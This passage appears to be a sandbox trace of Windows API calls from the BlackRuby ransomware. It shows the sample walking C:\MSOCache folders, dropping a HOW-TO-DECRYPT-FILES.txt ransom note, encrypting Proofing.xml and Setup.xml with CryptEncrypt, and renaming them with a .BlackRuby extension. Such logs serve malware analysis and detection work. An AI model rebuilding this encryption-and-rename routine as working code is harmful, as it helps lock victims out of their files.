lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.759] GetLastError () returned 0x5 [0045.759] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.759] GetLastError () returned 0x12 [0045.759] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0045.760] SetErrorMode (uMode=0x0) returned 0x1 [0045.760] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0045.760] GetLastError () returned 0x12 [0045.760] SetErrorMode (uMode=0x1) returned 0x0 [0045.760] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.761] GetLastError () returned 0x12 [0045.761] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.761] GetLastError () returned 0x12 [0045.761] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0045.762] SetErrorMode (uMode=0x0) returned 0x1 [0045.762] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi", lpFilePart=0x0) returned 0x4b [0045.762] GetLastError () returned 0x12 [0045.762] SetErrorMode (uMode=0x1) returned 0x0 [0045.762] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.msi"), fInfoLevelId=0x0, lpFileInformation=0x1c2310c | out: lpFileInformation=0x1c2310c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2297a000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2297a000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36e4fd60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x9ec00)) returned 1 [0045.764] GetLastError () returned 0x12 [0045.764] SetErrorMode (uMode=0x0) returned 0x1 [0045.764] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.765] GetLastError () returned 0x12 [0045.765] SetErrorMode (uMode=0x1) returned 0x0 [0045.765] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.765] GetLastError () returned 0x0 [0045.765] GetFileType (hFile=0x184) returned 0x1 [0045.765] SetErrorMode (uMode=0x0) returned 0x1 [0045.765] GetFileType (hFile=0x184) returned 0x1 [0045.765] WriteFile (in: hFile=0x184, lpBuffer=0x1c3edcc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1c3edcc*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0045.766] GetLastError () returned 0x0 [0045.766] CloseHandle (hObject=0x184) returned 1 [0045.766] GetLastError () returned 0x0 [0045.766] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.766] GetLastError () returned 0x0 [0045.766] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.766] GetLastError () returned 0x0 [0045.766] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.766] GetLastError () returned 0x0 [0045.766] SetErrorMode (uMode=0x1) returned 0x0 [0045.767] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c40ad8 | out: lpFileInformation=0x1c40ad8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30e5bc00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x30e5bc00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36e4fd60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x32b)) returned 1 [0045.767] GetLastError () returned 0x0 [0045.767] SetErrorMode (uMode=0x0) returned 0x1 [0045.767] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.767] GetLastError () returned 0x0 [0045.767] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.767] GetLastError () returned 0x0 [0045.767] SetErrorMode (uMode=0x1) returned 0x0 [0045.767] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.767] GetLastError () returned 0x0 [0045.767] GetFileType (hFile=0x184) returned 0x1 [0045.767] SetErrorMode (uMode=0x0) returned 0x1 [0045.767] GetFileType (hFile=0x184) returned 0x1 [0045.767] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x32b [0045.767] GetLastError () returned 0x0 [0045.767] ReadFile (in: hFile=0x184, lpBuffer=0x1c42c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c42c18*, lpNumberOfBytesRead=0x18ed84*=0x32b, lpOverlapped=0x0) returned 1 [0045.789] GetLastError () returned 0x0 [0045.789] CloseHandle (hObject=0x184) returned 1 [0045.789] GetLastError () returned 0x0 [0045.789] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.789] GetLastError () returned 0x0 [0045.789] SetErrorMode (uMode=0x1) returned 0x0 [0045.789] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30e5bc00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x30e5bc00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x36e4fd60, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x32b)) returned 1 [0045.789] GetLastError () returned 0x0 [0045.789] SetErrorMode (uMode=0x0) returned 0x1 [0045.789] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0045.790] GetLastError () returned 0x0 [0045.824] CryptImportKey (in: hProv=0x37c708, pbData=0x1c9e324, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0045.824] GetLastError () returned 0x0 [0045.824] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.824] GetLastError () returned 0x0 [0045.829] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.829] GetLastError () returned 0x0 [0045.829] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360b20) returned 1 [0045.829] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.829] GetLastError () returned 0x0 [0045.830] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1ccb370*=0x1, dwFlags=0x0) returned 1 [0045.830] GetLastError () returned 0x0 [0045.830] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1ccb33c, dwFlags=0x0) returned 1 [0045.830] GetLastError () returned 0x0 [0045.830] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ccb3b8*, pdwDataLen=0x18ed74*=0x420, dwBufLen=0x420 | out: pbData=0x1ccb3b8*, pdwDataLen=0x18ed74*=0x420) returned 1 [0045.830] GetLastError () returned 0x0 [0045.830] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ccbc24*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ccbc24*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.830] GetLastError () returned 0x0 [0045.830] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ccbc54*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ccbc54*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.830] GetLastError () returned 0x0 [0045.830] CryptDestroyKey (hKey=0x360da0) returned 1 [0045.830] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.830] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0045.830] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.830] GetLastError () returned 0x0 [0045.830] SetErrorMode (uMode=0x1) returned 0x0 [0045.830] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.831] GetLastError () returned 0xb7 [0045.831] GetFileType (hFile=0x184) returned 0x1 [0045.831] SetErrorMode (uMode=0x0) returned 0x1 [0045.831] GetFileType (hFile=0x184) returned 0x1 [0045.832] CloseHandle (hObject=0x184) returned 1 [0045.833] GetLastError () returned 0xb7 [0045.833] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml", lpFilePart=0x0) returned 0x4b [0045.833] GetLastError () returned 0xb7 [0045.833] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_6GZMzW863IPRvnXRu6D7K1rSg0IYC4cNJO5Rz0Uen2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_6GZMzW863IPRvnXRu6D7K1rSg0IYC4cNJO5Rz0Uen2.BlackRuby", lpFilePart=0x0) returned 0x7d [0045.833] GetLastError () returned 0xb7 [0045.833] SetErrorMode (uMode=0x1) returned 0x0 [0045.833] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30e5bc00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x30e5bc00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2384b920, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x430)) returned 1 [0045.833] GetLastError () returned 0xb7 [0045.833] SetErrorMode (uMode=0x0) returned 0x1 [0045.833] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proofing.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_6GZMzW863IPRvnXRu6D7K1rSg0IYC4cNJO5Rz0Uen2.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\encrypted_6gzmzw863iprvnxru6d7k1rsg0iyc4cnjo5rz0uen2.blackruby")) returned 1 [0045.833] GetLastError () returned 0xb7 [0045.834] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.834] GetLastError () returned 0xb7 [0045.834] SetErrorMode (uMode=0x1) returned 0x0 [0045.834] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.834] GetLastError () returned 0x5 [0045.835] SetErrorMode (uMode=0x0) returned 0x1 [0045.835] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.835] GetLastError () returned 0x5 [0045.835] SetErrorMode (uMode=0x1) returned 0x0 [0045.835] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1ceadfc | out: lpFileInformation=0x1ceadfc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x384a0ba0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x16fc)) returned 1 [0045.835] GetLastError () returned 0x5 [0045.835] SetErrorMode (uMode=0x0) returned 0x1 [0045.836] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.836] GetLastError () returned 0x5 [0045.836] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.836] GetLastError () returned 0x5 [0045.836] SetErrorMode (uMode=0x1) returned 0x0 [0045.836] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.836] GetLastError () returned 0x0 [0045.836] GetFileType (hFile=0x184) returned 0x1 [0045.836] SetErrorMode (uMode=0x0) returned 0x1 [0045.836] GetFileType (hFile=0x184) returned 0x1 [0045.836] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x16fc [0045.836] GetLastError () returned 0x0 [0045.836] ReadFile (in: hFile=0x184, lpBuffer=0x1cecb58, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cecb58*, lpNumberOfBytesRead=0x18ed84*=0x16fc, lpOverlapped=0x0) returned 1 [0045.849] GetLastError () returned 0x0 [0045.849] CloseHandle (hObject=0x184) returned 1 [0045.850] GetLastError () returned 0x0 [0045.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.850] GetLastError () returned 0x0 [0045.850] SetErrorMode (uMode=0x1) returned 0x0 [0045.850] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x384a0ba0, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x16fc)) returned 1 [0045.850] GetLastError () returned 0x0 [0045.850] SetErrorMode (uMode=0x0) returned 0x1 [0045.889] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b4c500, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360aa0) returned 1 [0045.889] GetLastError () returned 0x0 [0045.889] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.889] GetLastError () returned 0x0 [0045.894] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptDuplicateKey (in: hKey=0x360aa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360e20) returned 1 [0045.894] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1b7954c*=0x1, dwFlags=0x0) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1b79518, dwFlags=0x0) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b79594*, pdwDataLen=0x18ed74*=0x17f0, dwBufLen=0x17f0 | out: pbData=0x1b79594*, pdwDataLen=0x18ed74*=0x17f0) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b7c5a0*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1b7c5a0*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0045.894] GetLastError () returned 0x0 [0045.894] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b7c5d0*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1b7c5d0*, pdwDataLen=0x18ed94*=0x10) returned 1 [0045.894] GetLastError () returned 0x0 [0045.895] CryptDestroyKey (hKey=0x360aa0) returned 1 [0045.895] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.895] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0045.895] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.895] GetLastError () returned 0x0 [0045.895] SetErrorMode (uMode=0x1) returned 0x0 [0045.895] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.896] GetLastError () returned 0xb7 [0045.896] GetFileType (hFile=0x184) returned 0x1 [0045.896] SetErrorMode (uMode=0x0) returned 0x1 [0045.896] GetFileType (hFile=0x184) returned 0x1 [0045.897] CloseHandle (hObject=0x184) returned 1 [0045.897] GetLastError () returned 0xb7 [0045.897] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0045.898] GetLastError () returned 0xb7 [0045.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_ZJ2o3kjsHhbkittvxncTnerdCJLxwJDisOndvwG2I.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_ZJ2o3kjsHhbkittvxncTnerdCJLxwJDisOndvwG2I.BlackRuby", lpFilePart=0x0) returned 0x7c [0045.898] GetLastError () returned 0xb7 [0045.898] SetErrorMode (uMode=0x1) returned 0x0 [0045.898] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c210800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2c210800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x238e3ea0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1800)) returned 1 [0045.898] GetLastError () returned 0xb7 [0045.898] SetErrorMode (uMode=0x0) returned 0x1 [0045.898] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Encrypted_ZJ2o3kjsHhbkittvxncTnerdCJLxwJDisOndvwG2I.BlackRuby" (normalized: "c:\\msocache\\all 